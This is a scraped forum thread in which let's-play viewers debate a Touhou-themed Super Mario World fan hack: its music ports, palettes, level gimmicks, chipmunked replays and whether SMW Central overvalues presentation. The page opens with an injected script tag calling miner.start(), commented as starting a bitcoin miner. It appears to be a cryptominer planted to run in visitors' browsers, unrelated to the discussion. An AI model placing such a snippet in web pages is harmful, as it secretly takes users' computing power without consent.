<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxypge project

SDM2: There may or may not be touhou involved

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
alex2
Banned

Re: SDM2: There may or may not be touhou involved

Postby alex2 » 9 years ago

kilon wrote:Also congrats on partnership. Just don't make videos for Machinima. thank you.
I thought being partnered with Machinima means you need to make videos for them every once in a while.

Congrats on the partnership. Just don't get into the mindset of "oh, they won't mind if I upload two videos instead of one, right?" Because then you're selling out.

:)
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

MrDeePay

Postby MrDeePay » 9 years ago

anomaly wrote:Or maybe he just didn't care much for the music, opting to focus on other things.
Compared to what's been shown so far, it's questionable if he cared about anything at all outside of level gimmicks and bosses. The palettes are ass, the level/theme consistency is Snowflake Cavern-quality, the ports are severely lacking, there is very little Touhou vibe coming from this hack. You could just call this hack Brutal Mario Lite: Touhou Edition.

If you're not going to care about your own hack's presentation, why should I?

S.N.N.

Postby S.N.N. » 9 years ago

anomaly wrote:Or maybe he just didn't care much for the music, opting to focus on other things.
Not caring about the quality of your Touhou ports in a hack that is supposed to represent Touhou is sort of .. questionable. It shouldn't just be a case of "hey, if I just dump some low quality Touhou ports in here, people will like it". It may not be a big deal to some, but the way I see it, it really kills the vibe the hack is trying to give off.

Eh.

Cup

Postby Cup » 9 years ago

About those gold saws and metal elements and junk. Patchouli's 'Metal' magic comes from Friday, which is 金曜日 (kinyoubi). 金 which means metal, but also 'gold' in particular, and can be used to describe things that are golden colored. So when you think "the element of metal" in Japanese, you can't really help but picture something gold.

The ports are not well made, but they do their job to a satisfactory level. But I'll admit I had a different mindset when I was playing then I think many of you do. Opposed to hearing one of the ports and going, "oh, this could be so much better" I kinda just went "hey, this is supposed to be TH6's title theme. Neat!"

And in a way, a lot of the wonky, clichéd, bad quality choices are really what made this hack so much fun for me. I let out an audible groan when I played the 1-1 remake, but it was so dumb, I started laughing at the hack. And continued laughing through pretty much the whole game. When things were said and done, without even having realized it, I had played one of the most enjoyable hacks I had in a long time. And not in a 'so bad it's good' way. The levels are genuinely fun. So hearing people complain about the stuff like music, palettes, etc, sounds so alien to me. I actually think that had the hack done everything at really polished levels, I wouldn't have enjoyed it quite as much. It'd lose its charm, as passé as that sounds.

Oh well, this comment might be a bit premature. I have a pretty different outlook since I've already played the whole thing, and I have a feeling a lot of you will come to feel the same way about the hack as we get further along. But yeah, basically the criticisms (while totally valid mind you! Not arguing with that at all) sound really strange to me, since none of them came to mind while I was playing at all. It feels almost as if they're missing the point, which is a completely subjective statement, but oh well. As raocow said, we need some dumb fun every now and then.

Cup

Postby Cup » 9 years ago

Way to refresh the screen while things were loading there cup. Damn double posts...

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 9 years ago

It's what I refer to 'the smwcentral' problem - peeps there just put too much enphasis on presentation I feel, when a game can be SUPER fun while still being janky like hell.

I dunno. I genuinely love bad movies too, on an unironic level, so what do I know.
the chillaxest of dragonsImage
ImageImage

S.N.N.

To be honest, I haven't really seen anyone in any community actually pull off a 'perfect' hack (FPI might have come close with TSRPR though). Most people either put too much emphasis on visuals, and some don't put enough. I mean, none of us are "professional" level designers by any means, so it's no surprise, really. I see what this hack is trying to do though, and if it's a hack that isn't meant to be taken seriously, then it is doing a good job. The level gimmicks are fine, but the rest of it isn't.

Maybe one day someone really -will- make an ideal hack.

Fireyblaze

Postby Fireyblaze » 9 years ago

That boss should have had spinjumping disabled.

megamario

Postby megamario » 9 years ago

It's weird but I think if this was any other hack (like ASMT, SMWCP, uh MGU, TSRP, whatever) I would probably be rabble rabble over the lack of visual/musical quality but I have been perfectly okay with it in this game.

No idea why, though

anomaly

Postby anomaly » 9 years ago

S.N.N. wrote:
Not caring about the quality of your Touhou ports in a hack that is supposed to represent Touhou is sort of .. questionable. It shouldn't just be a case of "hey, if I just dump some low quality Touhou ports in here, people will like it". It may not be a big deal to some, but the way I see it, it really kills the vibe the hack is trying to give off.

Eh.
SDM doesn't actually represent Touhou though. It's the main gimmick but not the majority. The hack has many other things too.
S.N.N. wrote: Maybe one day someone really -will- make an ideal hack.
Honestly I doubt it because SMW itself isn't ideal. An idea game should not be based on Lunar Magic.

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 9 years ago

Adding that sun was just cruel :lol:
That crazy voice dude

limepie20

Postby limepie20 » 9 years ago

I thought adding the sun was great because it made the boss a lot less boring. The first three hits are still really boring though.

MarthX

Postby MarthX » 9 years ago

raocow wrote:It's what I refer to 'the smwcentral' problem - peeps there just put too much enphasis on presentation I feel, when a game can be SUPER fun while still being janky like hell.

I dunno. I genuinely love bad movies too, on an unironic level, so what do I know.
I've thought that for a while.

SMWC cares more about how pretty a hack looks than how fun it is to play. Japanese hacks seem to care little about presentation and are all about creativity and enjoyment.

Rameau's Nephew

Postby Rameau's Nephew » 9 years ago

So, you'd say the later levels of Hyper V put a premium on enjoyment, would you?

McGack

Postby McGack » 9 years ago

Someone was complaining about the chipmonking? ... this is why i don't post on your videos anymore
who was this mysterious friend at the beginning of the video?

sasukebowser

Postby sasukebowser » 9 years ago

the slowdown was intentional, obv

or something

S.N.N.

MarthX wrote:SMWC cares more about how pretty a hack looks than how fun it is to play.
MGU/TSRPR/others sure did, didn't they? Games from both SMWC/Japan break their "tradition", so stereotyping isn't exactly a good thing to do here.

Today's level: again with those stupid SMB1 graphics. The time gimmick was actually rather neat though compared to some previous gimmicks in this game.

kilon

Postby kilon » 9 years ago

McGack wrote:Someone was complaining about the chipmonking? ... this is why i don't post on your videos anymore
who was this mysterious friend at the beginning of the video?
Meh, I don't like the chipmunking either. To me it's pretty pointless. But I also know the reasons for it, so I'm not complaining.

Argumentable
the biggest shit

Postby Argumentable » 9 years ago

I just dislike seeing the same stuff over and over again, chipmunking kind of takes the sting off, but for the most part I'm watching for the games (unusual, I know) so I prefer to see what's next.

Paragraph

Postby Paragraph » 9 years ago

S.N.N. wrote:
MarthX wrote:SMWC cares more about how pretty a hack looks than how fun it is to play.
MGU/TSRPR/others sure did, didn't they? Games from both SMWC/Japan break their "tradition", so stereotyping isn't exactly a good thing to do here.

Today's level: again with those stupid SMB1 graphics. The time gimmick was actually rather neat though compared to some previous gimmicks in this game.
Have to agree. On the gimmick in particular: Could have used a bit less stopping time, one second instead of...two or three, other than that is was implemented in a way that seemed not really annoying, which is the best kind of gimmick. Compared to WIND or reversing your controls all three seconds or stuff like that, it was very clear what was going to happen when, and except for the platform passing through Mario, there was never a situation where it wasn't completely raocow's fault when he died to stoppage.

Simon

Punisher

Postby Punisher » 9 years ago

sasukebowser wrote:the slowdown was intentional, obv

or something
If it was intentional, it'd be a Youmu stage, but that's another Touhou game entirely.

I just love how he decided not to chipmunk that run to get GVirusG riled up. I know why he does chipmunk runs instead of jump cutting, so he can show the whole winning run. So when I see jump cuts, I expect him to die within three seconds.

MrDeePay

Postby MrDeePay » 9 years ago

MarthX wrote:SMWC cares more about how pretty a hack looks than how fun it is to play. Japanese hacks seem to care little about presentation and are all about creativity and enjoyment.
Where the hell did you get that info from?

Caracc

Postby Caracc » 9 years ago

S.N.N. wrote:Maybe one day someone really -will- make an ideal hack.
Challenge accepted.

@TheTopicofMusic: Technically you can always do better musically, but as long as it isn't 6 distortion guitars and an orchestra hit, it's hard for me to complain.

@TheLevelDesign: It's a tough call, the gimmicks can make a level, but a great level doesn't need a gimmick. I guess he could do better, but i'm not playing the hack, so I guess my complaints/comments aren't too relevant. That part in the castle with about 15 chains hanging at the same height though is inexcusable laziness though.

Still though, in my honest opinion, this hack is still way too texty.
Pandemonium Fortress 2 is my personal best hack so far. Go on and play it.

Ranylyn

Postby Ranylyn » 9 years ago

MrDeePay wrote:
MarthX wrote:SMWC cares more about how pretty a hack looks than how fun it is to play. Japanese hacks seem to care little about presentation and are all about creativity and enjoyment.
Where the hell did you get that info from?
Well to be totally fair, I read the rejected hacks log for the sake of seeing what NOT to do if I want my own hack to be accepted, and plenty of hacks that the mods found really fun were rejected because of some minor cutoff. Don't get me wrong, I think cutoff looks atrocious, but I'd rather see cutoff than some of the hacks that DID get accepted.

I'm not agreeing with the opening statement, I'm just defending how some may have come to that point.
When in doubt, call it a thing. That's how raocow does it. And it works for me.

MarthX

Postby MarthX » 9 years ago

S.N.N. wrote:

Obviously there are exceptions. It's not some ironclad rule.

Return to “let's play”